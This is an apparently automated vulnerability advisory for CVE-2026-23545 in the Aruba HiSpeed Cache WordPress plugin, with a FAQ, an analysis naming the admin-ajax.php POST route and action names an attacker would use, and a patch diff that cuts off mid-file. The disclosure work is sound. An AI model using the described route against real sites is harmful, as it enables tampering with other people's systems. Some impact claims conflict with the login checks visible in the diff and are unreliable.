What is CVE-2026-23545?

CVE-2026-23545 is a missing authorization vulnerability in the Aruba HiSpeed Cache plugin for WordPress, affecting versions up to and including 3.0.4. This vulnerability allows unauthenticated attackers to access administrative AJAX functions that should require authentication.

How does the vulnerability work?

The vulnerability arises from improper registration of AJAX handlers for unauthenticated users. Attackers can send POST requests to the WordPress AJAX endpoint with the appropriate action parameter, allowing them to execute functions that should only be accessible to logged-in users with administrative privileges.

Who is affected by this vulnerability?

Any WordPress site using the Aruba HiSpeed Cache plugin version 3.0.4 or earlier is affected by this vulnerability. Administrators should check their plugin version and update if necessary.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Aruba HiSpeed Cache plugin installed. If it is version 3.0.4 or earlier, your site is at risk. Additionally, review the plugin’s AJAX functionality for unauthorized access.

How can I fix this vulnerability?

The vulnerability is fixed in version 3.0.5 of the Aruba HiSpeed Cache plugin. Administrators should update to this version immediately to mitigate the risk. It is also advisable to review user permissions and AJAX access.

What does the CVSS score of 5.3 indicate?

A CVSS score of 5.3 indicates a medium severity level, meaning the vulnerability poses a moderate risk to affected systems. While it does not allow for remote code execution, it can lead to unauthorized control over the caching system.

What is the practical risk of this vulnerability?

The practical risks include unauthorized manipulation of the caching system, which can lead to denial of service, configuration changes, and performance degradation. Attackers can purge cached content or alter optimization settings.

What is nonce verification and how does it relate to this vulnerability?

Nonce verification is a security feature in WordPress that helps ensure that requests to perform actions are legitimate. In this case, while some functions had nonce checks, the overall missing authorization allowed attackers to exploit the vulnerability even with valid nonces.

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker can exploit the vulnerability by sending a crafted POST request to the AJAX endpoint with an action parameter. It highlights the ease of unauthorized access to administrative functions, emphasizing the need for immediate patching.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the Aruba HiSpeed Cache plugin temporarily to prevent exploitation. Additionally, review server logs for any unauthorized access attempts and implement additional security measures such as firewall rules.

Is there any other information I should be aware of regarding this vulnerability?

It is important to stay informed about security updates and vulnerabilities in plugins used on your WordPress site. Regularly check for updates and subscribe to security advisories to ensure your site remains secure.

How can I prevent similar vulnerabilities in the future?

To prevent similar vulnerabilities, ensure that all plugins and themes are regularly updated, limit the use of untrusted plugins, and conduct regular security audits of your WordPress site. Implementing a web application firewall can also provide an additional layer of protection.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-23545: Aruba HiSpeed Cache <= 3.0.4 – Missing Authorization (aruba-hispeed-cache)

CVE ID CVE-2026-23545

Plugin aruba-hispeed-cache

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 3.0.4

Patched Version 3.0.5

Disclosed February 17, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-23545:
The Aruba HiSpeed Cache WordPress plugin, versions up to and including 3.0.4, contains a missing authorization vulnerability. This flaw allows unauthenticated attackers to trigger privileged administrative AJAX actions. The vulnerability has a CVSS score of 5.3 and is classified under CWE-862 (Missing Authorization).

Atomic Edge research identifies the root cause as improper registration of AJAX handlers for unauthenticated users. The vulnerable plugin code in `aruba-hispeed-cache/aruba-hispeed-cache.php` registers multiple administrative functions with both `wp_ajax_{action}` and `wp_ajax_nopriv_{action}` hooks. This allows unauthenticated users to access functions that should require administrative privileges. The affected functions include `ahsc_ajax_enable_purge` (line 362), `ahsc_ajax_purge_homepage_on_edit` (line 382), `ahsc_ajax_purge_page_on_new_comment` (line 399), `ahsc_ajax_purge_archive_on_edit` (line 415), `ahsc_ajax_cache_warmer` (line 432), `ahsc_ajax_static_cache` (line 449), `ahsc_ajax_lazy_load` (line 465), `ahsc_ajax_html_optimizer` (line 480), `ahsc_ajax_dns_preconnect` (line 495), `ahsc_ajax_dns_preconnect_domain_list` (line 510), `ahsc_ajax_enable_cron` (line 550), `ahsc_ajax_cron_status` (line 577), `ahsc_ajax_cron_time` (line 593), `ahsc_ajax_xmlrpc_status` (line 613), `ahsc_ajax_reset_options` (line 629), and `ahsc_ajax_dboptimization_active` (line 660).

Exploitation requires sending POST requests to the WordPress AJAX endpoint `/wp-admin/admin-ajax.php` with the `action` parameter set to any of the vulnerable AJAX hooks. For example, an attacker can send a POST request with `action=ahsc_enable_purge` and a valid `ahsc_nonce` parameter. The nonce requirement does not prevent exploitation because authenticated users can obtain valid nonces through other means, and the vulnerability allows unauthenticated execution once a nonce is acquired. Attackers can also target functions like `ahsc_ajax_reset_options` which lacked nonce verification entirely in vulnerable versions.

The patch in version 3.0.5 comments out all `wp_ajax_nopriv_{action}` hook registrations. This change prevents unauthenticated users from accessing the administrative AJAX endpoints. The patch also adds missing nonce verification to the `ahsc_ajax_reset_options` function. Before the patch, unauthenticated users could trigger cache purging, configuration changes, and database optimization operations. After the patch, these actions require authenticated users with `manage_options` capability.

Successful exploitation allows attackers to manipulate the plugin’s cache system and configuration. Attackers can purge cached content, modify optimization settings, reset plugin options, and trigger database optimization operations. This can lead to denial of service through cache disruption, configuration tampering, and potential performance degradation. The vulnerability does not directly enable remote code execution or data exfiltration but provides unauthorized control over the caching infrastructure.

Differential between vulnerable and patched code

Code Diff

--- a/aruba-hispeed-cache/admin/assets/index.php
+++ b/aruba-hispeed-cache/admin/assets/index.php
@@ -1,6 +1,6 @@
-<?php
-/**
- * Silence is golden.
- *
- * @package ArubaHiSpeedCache
+<?php
+/**
+ * Silence is golden.
+ *
+ * @package ArubaHiSpeedCache
  */
 No newline at end of file
--- a/aruba-hispeed-cache/admin/index.php
+++ b/aruba-hispeed-cache/admin/index.php
@@ -1,6 +1,6 @@
-<?php
-/**
- * Silence is golden.
- *
- * @package ArubaHiSpeedCache
+<?php
+/**
+ * Silence is golden.
+ *
+ * @package ArubaHiSpeedCache
  */
 No newline at end of file
--- a/aruba-hispeed-cache/admin/pages/index.php
+++ b/aruba-hispeed-cache/admin/pages/index.php
@@ -1,6 +1,6 @@
-<?php
-/**
- * Silence is golden.
- *
- * @package ArubaHiSpeedCache
+<?php
+/**
+ * Silence is golden.
+ *
+ * @package ArubaHiSpeedCache
  */
 No newline at end of file
--- a/aruba-hispeed-cache/aruba-hispeed-cache.php
+++ b/aruba-hispeed-cache/aruba-hispeed-cache.php
@@ -14,7 +14,7 @@
  *
  * @wordpress-plugin
  * Plugin Name:       Aruba HiSpeed Cache
- * Version:           3.0.4
+ * Version:           3.0.5
  * Plugin URI:        https://hosting.aruba.it/wordpress.aspx
  *
  * @phpcs:ignore Generic.Files.LineLength.TooLong
@@ -362,7 +362,7 @@


 add_action("wp_ajax_ahsc_enable_purge", "ahsc_ajax_enable_purge");
-add_action("wp_ajax_nopriv_ahsc_enable_purge", "ahsc_ajax_enable_purge");
+//add_action("wp_ajax_nopriv_ahsc_enable_purge", "ahsc_ajax_enable_purge");
 function ahsc_ajax_enable_purge(){
 	if(is_user_logged_in() && current_user_can( 'manage_options' ) && isset($_POST['ahsc_nonce']) && wp_verify_nonce(sanitize_text_field(wp_unslash( $_POST['ahsc_nonce'])), 'ahsc-purge-cache' )  ) {
 		$result=array();
@@ -382,7 +382,7 @@
 }

 add_action("wp_ajax_ahsc_purge_homepage_on_edit", "ahsc_ajax_purge_homepage_on_edit");
-add_action("wp_ajax_nopriv_ahsc_purge_homepage_on_edit", "ahsc_ajax_purge_homepage_on_edit");
+//add_action("wp_ajax_nopriv_ahsc_purge_homepage_on_edit", "ahsc_ajax_purge_homepage_on_edit");
 function ahsc_ajax_purge_homepage_on_edit(){
 	if(is_user_logged_in() && current_user_can( 'manage_options' ) && isset($_POST['ahsc_nonce']) && wp_verify_nonce(sanitize_text_field(wp_unslash( $_POST['ahsc_nonce'])), 'ahsc-purge-cache' ) ) {

@@ -399,7 +399,7 @@


 add_action("wp_ajax_ahsc_purge_page_on_new_comment", "ahsc_ajax_purge_page_on_new_comment");
-add_action("wp_ajax_nopriv_ahsc_purge_page_on_new_comment", "ahsc_ajax_purge_page_on_new_comment");
+//add_action("wp_ajax_nopriv_ahsc_purge_page_on_new_comment", "ahsc_ajax_purge_page_on_new_comment");
 function ahsc_ajax_purge_page_on_new_comment(){
 	if(is_user_logged_in() && current_user_can( 'manage_options' ) && isset($_POST['ahsc_nonce']) && wp_verify_nonce(sanitize_text_field(wp_unslash( $_POST['ahsc_nonce'])), 'ahsc-purge-cache' )) {

@@ -415,7 +415,7 @@
 }
 //ahsc_purge_archive_on_edit
 add_action("wp_ajax_ahsc_purge_archive_on_edit", "ahsc_ajax_purge_archive_on_edit");
-add_action("wp_ajax_nopriv_ahsc_purge_archive_on_edit", "ahsc_ajax_purge_archive_on_edit");
+//add_action("wp_ajax_nopriv_ahsc_purge_archive_on_edit", "ahsc_ajax_purge_archive_on_edit");
 function ahsc_ajax_purge_archive_on_edit(){
 	if(is_user_logged_in() && current_user_can( 'manage_options' ) && isset($_POST['ahsc_nonce']) && wp_verify_nonce(sanitize_text_field(wp_unslash( $_POST['ahsc_nonce'])), 'ahsc-purge-cache' )) {

@@ -432,7 +432,7 @@

 //ahsc_cache_warmer
 add_action("wp_ajax_ahsc_cache_warmer", "ahsc_ajax_cache_warmer");
-add_action("wp_ajax_nopriv_ahsc_cache_warmer", "ahsc_ajax_cache_warmer");
+//add_action("wp_ajax_nopriv_ahsc_cache_warmer", "ahsc_ajax_cache_warmer");
 function ahsc_ajax_cache_warmer(){
 	if(is_user_logged_in() && current_user_can( 'manage_options' ) && isset($_POST['ahsc_nonce']) && wp_verify_nonce(sanitize_text_field(wp_unslash( $_POST['ahsc_nonce'])), 'ahsc-purge-cache' )) {

@@ -449,7 +449,7 @@

 //ahsc_static_cache
 add_action("wp_ajax_ahsc_static_cache", "ahsc_ajax_static_cache");
-add_action("wp_ajax_nopriv_ahsc_static_cache", "ahsc_ajax_static_cache");
+//add_action("wp_ajax_nopriv_ahsc_static_cache", "ahsc_ajax_static_cache");
 function ahsc_ajax_static_cache(){
 	if(is_user_logged_in() && current_user_can( 'manage_options' ) && isset($_POST['ahsc_nonce']) && wp_verify_nonce(sanitize_text_field(wp_unslash( $_POST['ahsc_nonce'])), 'ahsc-purge-cache' )) {

@@ -465,7 +465,7 @@
 }
 //ahsc_lazy_load
 add_action("wp_ajax_ahsc_lazy_load", "ahsc_ajax_lazy_load");
-add_action("wp_ajax_nopriv_ahsc_lazy_load", "ahsc_ajax_lazy_load");
+//add_action("wp_ajax_nopriv_ahsc_lazy_load", "ahsc_ajax_lazy_load");
 function ahsc_ajax_lazy_load(){
 	if(is_user_logged_in() && current_user_can( 'manage_options' ) && isset($_POST['ahsc_nonce']) && wp_verify_nonce(sanitize_text_field(wp_unslash( $_POST['ahsc_nonce'])), 'ahsc-purge-cache' )) {

@@ -480,7 +480,7 @@
 }
 //ahsc_html_optimizer
 add_action("wp_ajax_ahsc_html_optimizer", "ahsc_ajax_html_optimizer");
-add_action("wp_ajax_nopriv_ahsc_html_optimizer", "ahsc_ajax_html_optimizer");
+//add_action("wp_ajax_nopriv_ahsc_html_optimizer", "ahsc_ajax_html_optimizer");
 function ahsc_ajax_html_optimizer(){
 	if(is_user_logged_in() && current_user_can( 'manage_options' ) && isset($_POST['ahsc_nonce']) && wp_verify_nonce(sanitize_text_field(wp_unslash( $_POST['ahsc_nonce'])), 'ahsc-purge-cache' )) {

@@ -495,7 +495,7 @@
 }
 //ahsc_dns_preconnect
 add_action("wp_ajax_ahsc_dns_preconnect", "ahsc_ajax_dns_preconnect");
-add_action("wp_ajax_nopriv_ahsc_dns_preconnect", "ahsc_ajax_dns_preconnect");
+//add_action("wp_ajax_nopriv_ahsc_dns_preconnect", "ahsc_ajax_dns_preconnect");
 function ahsc_ajax_dns_preconnect(){
 	if(is_user_logged_in() && current_user_can( 'manage_options' ) && isset($_POST['ahsc_nonce']) && wp_verify_nonce(sanitize_text_field(wp_unslash( $_POST['ahsc_nonce'])), 'ahsc-purge-cache' )) {

@@ -510,7 +510,7 @@
 }
 //ahsc_dns_preconnect_domain_list
 add_action("wp_ajax_ahsc_dns_preconnect_domain_list", "ahsc_ajax_dns_preconnect_domain_list");
-add_action("wp_ajax_nopriv_ahsc_dns_preconnect_domain_list", "ahsc_ajax_dns_preconnect_domain_list");
+//add_action("wp_ajax_nopriv_ahsc_dns_preconnect_domain_list", "ahsc_ajax_dns_preconnect_domain_list");
 function ahsc_ajax_dns_preconnect_domain_list(){
 	if(is_user_logged_in() && current_user_can( 'manage_options' ) && isset($_POST['ahsc_nonce']) && wp_verify_nonce(sanitize_text_field(wp_unslash( $_POST['ahsc_nonce'])), 'ahsc-purge-cache' )) {

@@ -550,7 +550,7 @@
 }
 //ahsc_enable_cron
 add_action("wp_ajax_ahsc_enable_cron", "ahsc_ajax_enable_cron");
-add_action("wp_ajax_nopriv_ahsc_enable_cron", "ahsc_ajax_enable_cron");
+//add_action("wp_ajax_nopriv_ahsc_enable_cron", "ahsc_ajax_enable_cron");
 function ahsc_ajax_enable_cron(){
 	if(is_user_logged_in() && current_user_can( 'manage_options' ) && isset($_POST['ahsc_nonce']) && wp_verify_nonce(sanitize_text_field(wp_unslash( $_POST['ahsc_nonce'])), 'ahsc-purge-cache' )) {

@@ -577,7 +577,7 @@
 }
 //ahsc_cron_status
 add_action("wp_ajax_ahsc_cron_status", "ahsc_ajax_cron_status");
-add_action("wp_ajax_nopriv_ahsc_cron_status", "ahsc_ajax_cron_status");
+//add_action("wp_ajax_nopriv_ahsc_cron_status", "ahsc_ajax_cron_status");
 function ahsc_ajax_cron_status() {
 	if ( is_user_logged_in() && current_user_can( 'manage_options' ) && isset($_POST['ahsc_nonce']) && wp_verify_nonce(sanitize_text_field(wp_unslash( $_POST['ahsc_nonce'])), 'ahsc-purge-cache' )) {

@@ -593,7 +593,7 @@
 }
 //ahsc_cron_time
 add_action("wp_ajax_ahsc_cron_time", "ahsc_ajax_cron_time");
-add_action("wp_ajax_nopriv_ahsc_cron_time", "ahsc_ajax_cron_time");
+//add_action("wp_ajax_nopriv_ahsc_cron_time", "ahsc_ajax_cron_time");
 function ahsc_ajax_cron_time(){
 	if(is_user_logged_in() && current_user_can( 'manage_options' ) && isset($_POST['ahsc_nonce']) && wp_verify_nonce(sanitize_text_field(wp_unslash( $_POST['ahsc_nonce'])), 'ahsc-purge-cache' )) {

@@ -613,7 +613,7 @@
 }
 //ahsc_xmlrpc_status
 add_action("wp_ajax_ahsc_xmlrpc_status", "ahsc_ajax_xmlrpc_status");
-add_action("wp_ajax_nopriv_ahsc_xmlrpc_status", "ahsc_ajax_xmlrpc_status");
+//add_action("wp_ajax_nopriv_ahsc_xmlrpc_status", "ahsc_ajax_xmlrpc_status");
 function ahsc_ajax_xmlrpc_status(){
 	if(is_user_logged_in() && current_user_can( 'manage_options' ) && isset($_POST['ahsc_nonce']) && wp_verify_nonce(sanitize_text_field(wp_unslash( $_POST['ahsc_nonce'])), 'ahsc-purge-cache' )) {

@@ -629,9 +629,9 @@

 //ahsc_reset_options();
 add_action("wp_ajax_ahsc_reset_options", "ahsc_ajax_reset_options");
-add_action("wp_ajax_nopriv_ahsc_reset_options", "ahsc_ajax_reset_options");
+//add_action("wp_ajax_nopriv_ahsc_reset_options", "ahsc_ajax_reset_options");
 function ahsc_ajax_reset_options(){
-	if(is_user_logged_in() && current_user_can( 'manage_options' )) {
+	if(is_user_logged_in() && current_user_can( 'manage_options' ) && isset($_POST['ahsc_nonce']) && wp_verify_nonce(sanitize_text_field(wp_unslash( $_POST['ahsc_nonce'])), 'ahsc-purge-cache' )) {

 		$result            = array();
 		$msg               = ahsc_reset_options();
@@ -644,10 +644,10 @@
 }

 //ahsc_debug_status
-add_action("wp_ajax_ahsc_debug_status", "ahsc_ajax_debug_status");
+/*add_action("wp_ajax_ahsc_debug_status", "ahsc_ajax_debug_status");
 add_action("wp_ajax_nopriv_ahsc_debug_status", "ahsc_ajax_debug_status");
 function ahsc_ajax_debug_status(){
-	if(is_user_logged_in() && current_user_can( 'manage_options' )) {
+	if(is_user_logged_in() && current_user_can( 'manage_options' ) && isset($_POST['ahsc_nonce']) && wp_verify_nonce(sanitize_text_field(wp_unslash( $_POST['ahsc_nonce'])), 'ahsc-purge-cache' )) {
 		$result          = array();
 		$wpc_transformer = new HASC_WPCT( ABSPATH . 'wp-config.php' );
 		if ( $wpc_transformer->exists( 'constant', 'WP_DEBUG' ) ) {
@@ -660,11 +660,11 @@
 		echo wp_json_encode( $result );
 		die();
 	}
-}
+}*/

 //ahsc_debug_status
 add_action("wp_ajax_ahsc_dboptimization", "ahsc_ajax_dboptimization_active");
-add_action("wp_ajax_nopriv_ahsc_dboptimization", "ahsc_ajax_dboptimization_active");
+//add_action("wp_ajax_nopriv_ahsc_dboptimization", "ahsc_ajax_dboptimization_active");
 function ahsc_ajax_dboptimization_active(){
 	if(is_user_logged_in() && current_user_can( 'manage_options' )  && isset($_POST['ahsc_nonce']) && wp_verify_nonce(sanitize_text_field(wp_unslash( $_POST['ahsc_nonce'])), 'ahsc-purge-cache' )) {

--- a/aruba-hispeed-cache/assets/index.php
+++ b/aruba-hispeed-cache/assets/index.php
@@ -1,6 +1,6 @@
-<?php
-/**
- * Silence is golden.
- *
- * @package ArubaHiSpeedCache
+<?php
+/**
+ * Silence is golden.
+ *
+ * @package ArubaHiSpeedCache
  */
 No newline at end of file
--- a/aruba-hispeed-cache/assets/js/index.php
+++ b/aruba-hispeed-cache/assets/js/index.php
@@ -1,6 +1,6 @@
-<?php
-/**
- * Silence is golden.
- *
- * @package ArubaHiSpeedCache
+<?php
+/**
+ * Silence is golden.
+ *
+ * @package ArubaHiSpeedCache
  */
 No newline at end of file
--- a/aruba-hispeed-cache/languages/index.php
+++ b/aruba-hispeed-cache/languages/index.php
@@ -1,6 +1,6 @@
-<?php
-/**
- * Silence is golden.
- *
- * @package ArubaHiSpeedCache
+<?php
+/**
+ * Silence is golden.
+ *
+ * @package ArubaHiSpeedCache
  */
 No newline at end of file
--- a/aruba-hispeed-cache/src/AHSC_Apc.php
+++ b/aruba-hispeed-cache/src/AHSC_Apc.php
@@ -3,7 +3,7 @@
 	exit;
 }
 add_action("wp_ajax_ahsc_check_apc_file", "ahsc_check_apc_file");
-add_action("wp_ajax_nopriv_ahsc_check_apc_file", "ahsc_check_apc_file");
+//add_action("wp_ajax_nopriv_ahsc_check_apc_file", "ahsc_check_apc_file");

 function ahsc_check_apc_file() {
 	$target = WP_CONTENT_DIR . '/object-cache.php';
@@ -26,7 +26,7 @@
 }

 add_action("wp_ajax_ahsc_create_apc_file", "ahsc_create_apc_file");
-add_action("wp_ajax_nopriv_ahsc_create_apc_file", "ahsc_create_apc_file");
+//add_action("wp_ajax_nopriv_ahsc_create_apc_file", "ahsc_create_apc_file");
 function ahsc_create_apc_file(){
 	if(current_user_can( 'manage_options' ) && isset($_POST['ahsc_nonce']) && wp_verify_nonce(sanitize_text_field(wp_unslash( $_POST['ahsc_nonce'])), 'ahsc-purge-cache' )) {
 		$result = array();
@@ -43,7 +43,7 @@
 	die();
 }
 add_action("wp_ajax_ahsc_update_apc_Settings", "ahsc_update_apc_Settings");
-add_action("wp_ajax_nopriv_ahsc_update_apc_Settings", "ahsc_update_apc_Settings");
+//add_action("wp_ajax_nopriv_ahsc_update_apc_Settings", "ahsc_update_apc_Settings");
 function ahsc_update_apc_Settings() {
 	if(current_user_can( 'manage_options' ) && isset($_POST['ahsc_nonce']) && wp_verify_nonce(sanitize_text_field(wp_unslash( $_POST['ahsc_nonce'])), 'ahsc-purge-cache' )) {
 		$result            = array();
@@ -58,7 +58,7 @@


 add_action("wp_ajax_ahsc_delete_apc_file", "ahsc_delete_apc_file");
-add_action("wp_ajax_nopriv_ahsc_delete_apc_file", "ahsc_delete_apc_file");
+//add_action("wp_ajax_nopriv_ahsc_delete_apc_file", "ahsc_delete_apc_file");
 function ahsc_delete_apc_file(){
 	if(current_user_can( 'manage_options' ) && isset($_POST['ahsc_nonce']) && wp_verify_nonce(sanitize_text_field(wp_unslash( $_POST['ahsc_nonce'])), 'ahsc-purge-cache' )) {
 		$result = array();
--- a/aruba-hispeed-cache/src/AHSC_Dboptimization.php
+++ b/aruba-hispeed-cache/src/AHSC_Dboptimization.php
@@ -166,29 +166,61 @@
 	foreach($ahsc_tables as $table_name=>$index_settings){
 		$pfx=$wpdb->prefix.substr($table_name,'3',strlen($table_name));
 		//$sql="ALTER TABLE {$pfx} ROW_FORMAT=DYNAMIC;";
-		$wpdb->query( $wpdb->prepare("ALTER TABLE %s ROW_FORMAT=DYNAMIC;",array( $pfx) ));//@phpcs:ignore
+		$wpdb->query( $wpdb->prepare("ALTER TABLE %i ROW_FORMAT=DYNAMIC;",array( $pfx) ));//@phpcs:ignore
 		foreach($index_settings as $index_name=>$index_param){

-			$str_param=implode(",",$index_param['param']);
+			//$str_param=implode(",",$index_param['param']);
+
+			//$query_result[$pfx][$index_name]=array();
+			$param_count=count($index_param['param'])-1;
+			//$query_result[$pfx][$index_name]['param:count']=$param_count;
+			$str_param="";
+			$prepare_arr=array();
+
+            array_push($prepare_arr,$pfx);
+			array_push($prepare_arr,$index_name);
+			foreach($index_param['param'] as $pos=>$val){
+				array_push($prepare_arr,$val);
+			}
+
+			$param_prepare_str="";
+			for($i=0;$i<=$param_count;$i++){
+				$param_prepare_str.="%i,";
+
+			}
+			$param_prepare_str=substr($param_prepare_str,0,strlen($param_prepare_str)-1);
+			//$query_result[$pfx][$index_name]['param:str']=$param_prepare_str;
+			//$query_result[$pfx][$index_name]['param:str:val']=$str_param;
 			$k_exs=AHSC_check_key_exists($index_name,$table_name);
+
+			/*switch ($index_param['type']) {
+				case "UNIQUE KEY":
+					$query_result[$pfx][$index_name]['sql']=$wpdb->prepare("ALTER TABLE %i ADD CONSTRAINT %i UNIQUE ($param_prepare_str)",$prepare_arr);
+				case "KEY":
+					$query_result[$pfx][$index_name]['sql']=$wpdb->prepare("ALTER TABLE %i ADD KEY %i ($param_prepare_str)",$prepare_arr);
+
+			}*/
+
 			if(!$k_exs){
+
 				switch ($index_param['type']){
 					case "UNIQUE KEY":
 						//$sql="ALTER TABLE {$pfx} ADD CONSTRAINT {$index_name} UNIQUE ({$str_param}) ";
-						$wpdb->query( $wpdb->prepare("ALTER TABLE %s ADD CONSTRAINT %s UNIQUE (%s)",array( $pfx,$index_name,$str_param)));//@phpcs:ignore
+
+						$wpdb->query( $wpdb->prepare("ALTER TABLE %i ADD CONSTRAINT %i UNIQUE ($param_prepare_str)",$prepare_arr));//@phpcs:ignore
 						break;
 					case "KEY":
 						//$sql="ALTER TABLE {$pfx} ADD KEY {$index_name} ({$str_param})";
-						$wpdb->query( $wpdb->prepare("ALTER TABLE %s ADD KEY %s (%s)",array( $pfx,$index_name,$str_param)));//@phpcs:ignore
+
+						$wpdb->query( $wpdb->prepare("ALTER TABLE %i ADD KEY %i ($param_prepare_str)",$prepare_arr));//@phpcs:ignore
 						break;
 				}
-				//$query_result[$pfx][$index_name]=array();
-				//$query_result[$pfx][$index_name]['sql'] = $sql;
-				//$query_result[$pfx][$index_name]['result'] =$wpdb->query( $sql );
+
+
 			}
 		}
 	}
-/*	echo "<pre><p>===================================AGGIUNTA=====================================================</p>".
+	/*echo "<pre><p>===================================AGGIUNTA=====================================================</p>".
 	     var_export($query_result,true).
 	     "<p>================================================================================================</p></pre>";*/
 	return $query_result;
@@ -210,19 +242,19 @@
 			$pfx=$wpdb->prefix.substr($table_name,'3',strlen($table_name));
 			switch ($index_param['type']){
 				case "UNIQUE KEY":
-					$sql="ALTER TABLE {$pfx} DROP INDEX {$index_name}";
+					//$sql="ALTER TABLE {$pfx} DROP INDEX {$index_name}";

-					$wpdb->query( $wpdb->prepare("DROP INDEX %s ON %s;",array( $index_name,$pfx)));//@phpcs:ignore
+					$wpdb->query( $wpdb->prepare("DROP INDEX %i ON %i;",array( $index_name,$pfx)));//@phpcs:ignore

 					break;
 				case "KEY":
-					$sql="ALTER TABLE {$pfx} DROP KEY {$index_name}";
-					//$wpdb->query( $wpdb->prepare("ALTER TABLE %s DROP KEY %s;",array( $pfx,$index_name)));//@phpcs:ignore
+					//$sql="ALTER TABLE {$pfx} DROP KEY {$index_name}";
+					$wpdb->query( $wpdb->prepare("ALTER TABLE %i DROP KEY %i;",array( $pfx,$index_name)));//@phpcs:ignore
 					break;
 			}
-			$query_result[$pfx][$index_name]=array();
-			$query_result[$pfx][$index_name]['sql'] =  $sql; //$wpdb->query( $sql );
-			$query_result[$pfx][$index_name]['result'] = $wpdb->query( $sql );//@phpcs:ignore
+			//$query_result[$pfx][$index_name]=array();
+			//$query_result[$pfx][$index_name]['sql'] =  $sql; //$wpdb->query( $sql );
+			//$query_result[$pfx][$index_name]['result'] = $wpdb->query( $sql );//@phpcs:ignore

 		}
 	}
--- a/aruba-hispeed-cache/src/AHSC_Warmer.php
+++ b/aruba-hispeed-cache/src/AHSC_Warmer.php
@@ -4,7 +4,7 @@
 }
 if(isset(AHSC_CONSTANT['ARUBA_HISPEED_CACHE_OPTIONS']['ahsc_cache_warmer']) && AHSC_CONSTANT['ARUBA_HISPEED_CACHE_OPTIONS']['ahsc_cache_warmer']!=="false"){
     add_action( 'wp_ajax_ahcs_cache_warmer',  'ahsc_cache_warmer_ajax_action' , 100 );
-    add_action( 'wp_ajax_nopriv_ahcs_cache_warmer', 'ahsc_cache_warmer_ajax_action' , 100 );
+    //add_action( 'wp_ajax_nopriv_ahcs_cache_warmer', 'ahsc_cache_warmer_ajax_action' , 100 );

 	$ahsc_do_purge=get_option('ahsc_do_cache_warmer',false);
 	//$do_purge = ahsc_has_transient( 'ahsc_do_cache_warmer' );
--- a/aruba-hispeed-cache/src/APC/object-cache.php
+++ b/aruba-hispeed-cache/src/APC/object-cache.php
@@ -1,353 +1,353 @@
-<?php
-if ( ! defined( 'ABSPATH' ) ) {
-	exit;
-}
-//@phpcs:ignoreFile
-if ( function_exists( 'apcu_fetch' ) ) :
-
-	if ( version_compare( '5.2.4', phpversion(), '>=' ) ) {
-		wp_die( 'The APC object cache backend requires PHP 5.2 or higher. You are running ' . esc_attr(phpversion()) . '. Please remove the <code>object-cache.php</code> file from your content directory.' );
-	}
-
-	if ( function_exists( 'wp_cache_add' ) ) {
-		// Regular die, not wp_die(), because it gets sandboxed and shown in a small iframe
-		die( '<strong>ERROR:</strong> This is <em>not</em> a plugin, and it should not be activated as one.<br /><br />Instead, <code>' . ((isset($_SERVER['DOCUMENT_ROOT']))? esc_attr(str_replace(esc_attr(wp_unslash($_SERVER['DOCUMENT_ROOT'])), '', __FILE__ )):""). '</code> must be moved to <code>' . esc_attr(str_replace( esc_attr(wp_unslash($_SERVER['DOCUMENT_ROOT'])), '', trailingslashit( WP_CONTENT_DIR ) ) ). 'object-cache.php</code>' );//@phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized
-	} else {
-
-// Users with setups where multiple installs share a common wp-config.php can use this
-// to guarantee uniqueness for the keys generated by this object cache
-		if ( !defined( 'WP_APC_KEY_SALT' ) )
-			define( 'WP_APC_KEY_SALT', 'wp' );
-
-		function wp_cache_add( $key, $data, $group = '', $expire = 0 ) {
-			global $wp_object_cache;
-
-			return $wp_object_cache->add( $key, $data, $group, $expire );
-		}
-
-		function wp_cache_incr( $key, $n = 1, $group = '' ) {
-			global $wp_object_cache;
-
-			return $wp_object_cache->incr2( $key, $n, $group );
-		}
-
-		function wp_cache_decr( $key, $n = 1, $group = '' ) {
-			global $wp_object_cache;
-
-			return $wp_object_cache->decr( $key, $n, $group );
-		}
-
-		function wp_cache_close() {
-			return true;
-		}
-
-		function wp_cache_delete( $key, $group = '' ) {
-			global $wp_object_cache;
-
-			return $wp_object_cache->delete( $key, $group );
-		}
-
-		function wp_cache_flush() {
-			global $wp_object_cache;
-
-			return $wp_object_cache->flush();
-		}
-
-		function wp_cache_get( $key, $group = '', $force = false ) {
-			global $wp_object_cache;
-
-			return $wp_object_cache->get( $key, $group, $force );
-		}
-
-		function wp_cache_init() {
-			global $wp_object_cache;
-
-			$wp_object_cache = new APC_Object_Cache();
-		}
-
-		function wp_cache_replace( $key, $data, $group = '', $expire = 0 ) {
-			global $wp_object_cache;
-
-			return $wp_object_cache->replace( $key, $data, $group, $expire );
-		}
-
-		function wp_cache_set( $key, $data, $group = '', $expire = 0 ) {
-			global $wp_object_cache;
-
-			if ( defined('WP_INSTALLING') == false )
-				return $wp_object_cache->set( $key, $data, $group, $expire );
-			else
-				return $wp_object_cache->delete( $key, $group );
-		}
-
-		function wp_cache_switch_to_blog( $blog_id ) {
-			global $wp_object_cache;
-
-			return $wp_object_cache->switch_to_blog( $blog_id );
-		}
-
-		function wp_cache_add_global_groups( $groups ) {
-			global $wp_object_cache;
-
-			$wp_object_cache->add_global_groups( $groups );
-		}
-
-		function wp_cache_add_non_persistent_groups( $groups ) {
-			global $wp_object_cache;
-
-			$wp_object_cache->add_non_persistent_groups( $groups );
-		}
-
-		class WP_Object_Cache {
-			var $global_groups = array();
-
-			var $no_mc_groups = array();
-
-			var $cache = array();
-			var $stats = array( 'get' => 0, 'delete' => 0, 'add' => 0 );
-			var $group_ops = array();
-
-			var $cache_enabled = true;
-			var $default_expiration = 0;
-			var $abspath = '';
-			var $debug = false;
-
-			function add( $id, $data, $group = 'default', $expire = 0 ) {
-				$key = $this->key( $id, $group );
-
-				if ( is_object( $data ) )
-					$data = clone $data;
-
-				$store_data = $data;
-
-				if ( is_array( $data ) )
-					$store_data = new ArrayObject( $data );
-
-				if ( in_array( $group, $this->no_mc_groups ) ) {
-					$this->cache[$key] = $data;
-					return true;
-				} elseif ( isset( $this->cache[$key] ) && $this->cache[$key] !== false ) {
-					return false;
-				}
-
-				$expire = ( $expire == 0 ) ? $this->default_expiration : $expire;
-
-				$result = apcu_add( $key, $store_data, $expire );
